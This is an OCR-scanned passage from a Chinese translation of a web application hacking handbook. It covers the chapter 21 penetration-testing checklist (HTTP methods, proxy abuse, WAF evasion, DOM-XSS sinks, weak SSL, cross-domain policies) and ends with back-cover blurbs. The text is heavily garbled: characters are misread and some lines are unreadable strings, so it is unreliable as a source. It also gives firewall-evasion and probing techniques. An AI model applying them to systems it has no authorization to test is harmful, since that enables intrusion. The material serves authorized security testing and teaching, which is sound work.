(5) 如 果 能 够 访问 管理 接口 ， 审 碍 可 用 的 功能 ， 确 定 是 否 可 以 利 
用 这 项 功能 进一步 攻破 主机 与 主 应 用 程序 。 











(1) 分 析 Nikto 扫 描 结果 21.1.4 节 中 的 第 1 步 ) ， 确 定 服务 器 上 存 
在 的 、 但 并 不 属于 应 用 程序 的 默认 内 容 。 

(2) 使 用 搜索 引擎 与 其 他 资源 《〈 如 www.exploit-db.com) 确定 已 知 
应 用 程序 所 使 用 的 技术 的 默认 内 容 与 功能 。 如 有 可 能 ， 在 本 地 安装 这 些 
技术 ， 并 在 其 中 查找 可 在 渗透 测试 中 利用 的 所 有 默认 功能 。 








(3) 检查 默认 内 容 ， 从 中 查找 任 何 可 用 于 攻击 服务 器 或 应 用 程序 
的 功能 或 漏洞 。 





(1) 使 用 OPTIONS 方 法 列 出 服务 器 使 用 的 HTTP 方 法 。 请 注意 ， 
不 同 目录 中 激活 的 方法 可 能 各 不 相同 。 可 以 使 用 Paros 进 行 漏洞 扫描 ， 
帮助 完成 这 个 检查 。 

(2) 手动 测试 每 一 种 方法 ， 确 认 其 是 否 可 用 。 

(3) 如 果 发 现 一 些 WebDAV 方 法 被 激活 ， 使 用 一 个 激活 WebDAV 
的 客户 端 进行 深入 调查 ， 如 Microsoft FrontPage 或 Internet Explorer 中 的 
Open as Web Folder 〈 以 Web 文 件 夹 打开 ) 选项 。 


21.11.4 测试 代理 功能 


(1) 使 用 GET 与 CONNECT 请 求 ， 尝 试 使 用 Web 服 务 器 作为 代理 服 
务 器 ， 连 接 因特网 上 的 其 他 服务 器 ， 并 获取 其 中 的 内 容 。 

C2) 尝试 使 用 前 面 摘 述 的 两 种 技巧 连接 主机 基础 架构 中 的 不 同 IP 
地 址 与 端口 。 

(3) 尝试 使 用 前 面 摘 述 的 两 种 技巧 ， 在 请 求 中 指定 127.0.0.1 为 目 
标 主 机 ， 连 接 Web 服 务 器 上 的 常用 端口 号 。 








(1) 使 用 以 下 方式 同根 目录 提交 GET 请 求 : 
口 正 确 的 Host 消 息 头 ; 
口 恶意 Host 消 息 头 ; 
口 Host 消 息 头 中 的 服务 器 耻 地 址 ; 
口 无 Host 消 息 头 《〈 仅 使 用 HTTP/1.0) 。 
(2) 比较 对 这 些 请 求 的 啊 应 。 常 见 的 结果 是 ， 在 Host 消 恩 头 中 使 
用 服务 器 的 IP 地 址 获得 目录 列表 。 还 可 以 获得 各 种 默认 内 容 。 
(3) 如 果 观 测 到 应 用 程序 表现 出 不 同 的 行为 ， 使 用 生成 不 同 结果 























的 主机 名 称 重复 21.1 节 描述 的 应 用 程序 解析 过 程 。 一 定 要 使 用 -vhost 先 
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(1) (8A Nessus-‘S ATA HATA RA shies, WE Arial 
的 web 服务器 软件 中 存在 的 所 有 已 知 漏洞 。 

(2) 同时， 浏览 Security Focus、Bugtraq 和 Full Disclosure 等 资源 ， 
在 攻击 目标 中 得 找 最 近 发 现 的、 尚未 修复 的 漏洞 信息 。 

(3) 如 采 应 用 程序 由 第 三 方 开发 ， 确 定 它 是 人 否 上 自 珊 Web 服 务 器 
《 通 音 为 一 个 开源 服务 器 ) ; 如 果 是 ， 在 这 个 服务 器 中 碍 找 所 有 漏洞 。 
请 注意 ， 在 这 种 情况 下 ， 服 务 器 的 标准 版 本 信息 可 能 已 被 修改 。 

(4) 如 有 可 能 ， 应 该 考虑 在 本 地 安装 所 测试 的 软件 ， 并 上 自己 进行 
测试 ， 碍 找 尚 未 发 现 或 广泛 流传 的 新 漏洞 。 











(1) 在 参数 值 中 使 用 明确 的 攻击 有 效 载 答 同 应 用 程序 (最 好 古 啊 
应 中 包含 名 称 和 /或 值 的 菜 个 应 用 程序 位 置 ) 提交 任 意 参数 名 称 。 如 果 
应 用 程序 阻止 该 攻击 ， 这 可 能 是 由 于 外 部 防御 机 制 所 致 。 

(2) 如 果 可 以 提交 在 服务 器 啊 应 中 返回 的 变量 ， 则 提供 一 系列 模 
人 
御 行 为 。 

(3) 对 应 用 程序 中 的 变量 实施 相同 的 攻击 来 确认 这 一 行为 。 

(4) 对 于 所 有 模糊 测试 字符 串 和 请 求 ， 使 用 标准 签名 数据 库 中 不 
可 能 存在 的 有 效 载荷 字符 串 。 根 据 定 义 ， 我 们 不 可 能 提供 这 些 字符 串 的 














示例 。 但 是 ， 在 进行 文件 检索 时 ， 应 避免 将 /etc/passwd 
或 /windows/system32/config/sam 作 为 有 效 载 荷 。 此 外 ， 应 在 XSS 攻 击 中 
避免 使 用 <script>， 并 避免 将 alert O 或 xss 用 作 XSS 有 效 载荷 。 

(5) 如 果 特 定 请 求 被 阻止 ， 可 以 尝试 在 其 他 位 置 或 上 下 文中 提交 
相同 的 参数 。 例 如 ， 在 GET 请 求 的 URL 中 、 在 POST 请 求 主 体 中 ， 以 及 
在 POST 请 求 的 URL 中 提交 相同 的 参数 。 

(6) 此 外 ， 应 尝试 在 ASP.NET 上 将 参数 作为 cookie 提 交 。 如 果 在 查 
询 字 符 串 或 消息 主体 中 找 不 到 参数 fo0，API Request.Params[“foo”] 会 检 
索 名 为 foo 的 cookie 的 值 。 

(7) 回顾 第 4 章 中 介绍 的 引入 用 户 输入 的 所 有 其 他 方法 ， 选 择 其 中 
任何 不 受 保护 的 方法 。 

(8) 确定 以 非 标准 格式 〈 如 序列 化 或 编码 ) 或 可 能 以 此 类 格式 提 
交 用 户 输入 的 位 置 。 如 果 找 不 到 此 类 位 置 ， 可 以 通过 串联 字符 串 和 /或 
将 字符 串 分 布 到 多 个 参数 中 来 构建 攻击 字符 串 。 注意， 如 果 目 标 是 
oT 可 以 使 用 HPP 通 过 同一 变量 的 各 种 变 体 来 串联 攻击 字符 

o ) 








21.12 其 他 检查 


21.12.1 测试 基于 DOM 的 攻击 


21.12.2 测试 本 地 隐私 漏洞 





21.12.3 测试 脆弱 的 SSL 加 密 算法 


21.12.4 检测 同 源 策略 配置 


图 21-13 ”其 他 检查 


21.12.1 测试 基于 DOMH 了 


G) 对 应 用 程序 中 包含 的 每 一 段 JavaScript 脚 本 进行 简单 的 代码 审 
得 ， 确 定 可 通过 任何 一 个 专门 设计 的 URL、 在 相关 页 面 的 DOM 中 引入 
恶意 数据 而 触发 的 XSS 或 重 定 回 漏 洞 。 审 碍 内 容 包 括 HIML 页 面 〈 无 论 
静态 或 动态 生成 的 页 面 ) 中 的 所 有 单独 的 JavaScript 文 件 和 脚本 。 

(2) 确定 使 用 以 下 API 的 所 有 情况 ， 使 用 这 些 API 可 访问 通过 一 个 
专门 设计 的 URL 控 制 的 DOM 数 据 : 

document. location 

document . URL 

document . URLUnencoded 





document.referrer 
window. location 


(3) 在 代码 中 退 踪 相关 数据 ， 确 定 应 用 程序 对 它 执行 何 种 操作 。 


如 果 数 据 (或 它 的 一 个 说 操纵 的 表单 ) 被 提交 给 下 列 API 中 的 一 个 ， 那 
么 应 用 程序 可 能 易于 受到 XSS 攻 击 : 


Gocument .writet) 





document.writeln() 
document. body. innerktml 
eval {} 

window. execScript {} 
window. setInterval () 


window. setTimeout {)} 


(4) 如 果 数 据 被 提交 给 下 列 API 中 的 一 个 ， 那 么 应 用 程序 可 能 易于 
受到 重 定 癌 攻击: 


document. location 





document .URL 
document .open {) 
window. location. href 
window.navigate() 


window. open {} 





C1) 检查 拦截 代理 服务 器 生成 的 日 志 ， 确 定 测试 过 程 中 应 用 程序 
送出 的 所 有 Set-Cookie 指 令 。 如 果 发 现 有 任何 SetrCookie 指 令 包 含 一 个 将 
来 日 期 的 expires 属 性 ， 用 户 的 浏览 器 会 将 该 cookie 保 持 到 这 个 日 期 。 检 
查 传 送 敏 感 数 据 的 持久 性 cookie 的 所 有 内 容 。 

(2) 如 果 一 个 持久 性 cookie 中 包含 敏感 数据 ， 那 么 本 地 攻击 者 就 能 
够 截获 这 些 数 据 。 即 使 这 些 数 据 被 加 密 ， 和 截获 它们 的 攻击 者 仍然 可 以 将 
这 个 cookie 重 新 提交 给 应 用 程序 ， 访 问 该 cookie 访 问 的 任何 数据 或 功 
能 。 

(3) 如 果 包 含 敏感 数据 的 页 面 通过 HTTP 访 问 ， 在 服务 器 啊 应 中 寻 
找 绥 存 指令 。 如 果 其 中 没有 下 列 指令 〈 在 HITP 消 息 头 或 HITML 元 标签 
中 ) ， 那 么 相关 页 面 可 能 被 一 个 或 几 个 浏览 右 存 入 绥 存 : 


Expires: 0 
Cache-control: no-cache 
Pragma: no-cache 


(4) 确定 应 用 程序 中 通过 UREL 参 数 传送 敏感 数据 的 所 有 情况 。 如 
果 存 在 这 样 的 情况 ， 检 查 浏 览 器 的 历史 记录 ， 证 实 这 些 数据 已 经 保存 在 
那里 


(5) 对 于 用 户 提交 敏感 数据 〈 如 信用 卡 信息 ) 的 所 有 表单 ， 审 查 
其 中 的 HTML 源 代码 。 如 果 没 有 在 表单 标签 或 输入 字段 的 标签 中 设置 
autocomplete=off 属 性 ， 输 入 的 数据 将 保存 在 激活 自动 完成 的 浏览 器 中 。 





(1) 如 果 应 用 程序 使 用 SSL 进 行 通信 ， 使 用 THCSSLCheck 工 具 列 
出 它 支持 的 加 和 密 算法 和 协议 。 

(2) 如 果 SSL 支 持 脆弱 或 过 时 的 加 密 算 法 和 协议 ， 处 在 适当 位 置 
的 攻击 者 就 可 以 实施 攻击 ， 降 级 或 破译 应 用 程序 用 户 的 SSL 通 信 ， 访 问 
他 们 的 敏感 数据 。 

(3) 一 些 Web 服 务 右 声称 它 支 持 某 些 脆弱 加 密 算 法 和 协议 ， 但 如 
果 客 户 提 出 请 求 ， 它 实际 上 拒绝 使 用 这 些 算法 和 协议 完成 握手 。 在 使 用 
THCSSLCheck 工 具 时 ， 这 种 情况 可 能 会 造成 错误 警报 。 可 以 使 用 Opera 
浏览 器 ， 尝 试 通过 指定 的 脆弱 协议 完成 一 次 握手 ， 确 定 是 否 可 使 用 这 些 








协议 访问 应 用 程序 。 








(1) 检查 /crossdomain.xml 文 件 。 如 果 应 用 程序 允许 无 限制 访问 
(通过 指定 <allow-access-from domain=“*” />) ， 来 自 其 他 站 点 的 Flash 
对 象 可 以 “ 登 置 > 应 用 程序 用 户 的 会 话 ， 以 进行 双 同 交互 。 这 导致 任何 其 

他 域 可 以 检索 所 有 数据 ， 并 执行 任何 用 户 操作 。 

(2) 检查 /clientaccesspolicy.xml 文 件 。 与 Flash 类 似 ， 如 果 <cross- 
oe 宽泛 ， 其 他 站 点 将 可 以 与 接受 测试 的 站 点 进行 
双 同 交互 。 

(3) 通过 添加 指定 其 他 域 的 Origin 消 息 涉 并 检查 返回 的 任何 
Access-Control 消 息 头 ， 使 用 XMLHttpRequest 测 试 应 用 程序 如 何 处 理 跨 
域 请 求 。 人 允许 任何 域 、 或 指定 的 其 他 域 进行 双 同 交互 的 安全 隐患 与 Flash 
跨 域 策略 造成 的 安全 隐患 相同 。 














(1) 在 探查 目标 应 用 程序 的 整个 过 程 中 ， 监 控 它 的 啊 应 ， 碍 找 可 
T a 
错误 消息 。 

(2) 如 果 收 到 不 常见 的 错误 消 轧 ， 使 用 标准 的 搜索 引擎 检查 这 些 
消息 。 可 以 使 用 各 种 高 级 搜索 特性 编 小 搜索 范围 。 例 如 : 


"unable to retrieve" filetype:php 


(3) 检查 搜索 结果 ， 寻 找 关 于 错误 消息 的 所 有 讨论 以 及 其 他 出 现 
相同 消 妃 的 所 有 站 点 。 其 他 应 用 程序 生成 的 同一 条 错误 消息 可 能 更 详 
细 ， 有 助 于 渗透 测试 员 更 好 地 了 解 错误 条 件 。 使 用 搜索 引擎 缓存 获取 不 
再 出 现在 当前 应 用 程序 中 的 错误 消息 。 

(4) 使 用 Google 代 码 搜 索 碍 找 生 成 特定 错误 消息 的 、 公 开发 布 的 
所 有 代码 。 搜 索 可 能 被 硬 编 码 到 应 用 程序 源 代 码 中 的 错误 消息 代码 段 。 
还 可 以 使 用 各 种 高 级 搜索 特性 指定 代码 语言 及 其 他 已 知 的 细节 。 例 如 : 


unable\ to\ retrieve lang:php package:mail 


(5) MURR eS R77 SN AARRE os a YE A, 
在 上 述 两 种 搜索 引擎 中 搜索 这 些 名 称 。 
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Jason Haddix, HŽ An AAMA A 


“如 条 你 对 Web 应 用 程序 安全 感 兴趣 ， 我 强烈 推荐 本 书 ， 它 实 为 
Web 安 全 人 士 必 读 之 作 。” 
Robert Wesley McGrew, McGrew 安 全 公司 研究 人 员 


“VAR ie Web GURL A CPE, QA AZ EY 
完善 ， 绝 对 值得 拥有 ! ” 








Daniel Miessler， 安 全 顾问 
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Web 应 用 无 处 不 在 ， 安 全 隐患 如 影 随 形 。 承 载 厦 丰 是 功 能 与 用 途 的 
Web 应 用 程序 中 布 满 了 各 种 漏洞 ， 攻 击 者 能 够 利用 这 些 漏洞 盗 取 用 户 资 
料 ， 实 施 诈 骗 ， 破 坏 其 他 系统 等 。 近 年 来 ， 一 些 公 司 的 网 络 系 统 频 频 遭 
受 攻 击 ， 导 致 用 户 信息 泄露 ， 造 成 不 恨 影响 。 因 此 ， 如 何 确保 Web 应 用 
程序 的 安全 ， 已 成 为 摆 在 人 们 眼前 叹 竺 解决 问题 。 


本 书 是 Web 安 全 领域 专家 的 经 验 结 量 ， 系 统 阐 述 了 如 何 针对 Web 应 
用 程序 展开 攻击 与 反攻 击 ， 深 入 剖析 了 攻击 时 所 使 用 的 技巧 、 步 又 和 工 
具 ， 条 理 清 晰 ， 内 容 详尽 。 第 2 厂 全 面 升 级 ， 涵 兰 了 最 新 的 攻击 技巧 与 
应 对 措施 ， 此 外 ， 书 中 还 列 出 了 几 百 个 “漏洞 实验 室 *， 以 帮助 读者 对 所 
学 内 容 进行 巩固 和 实战 演习 。 
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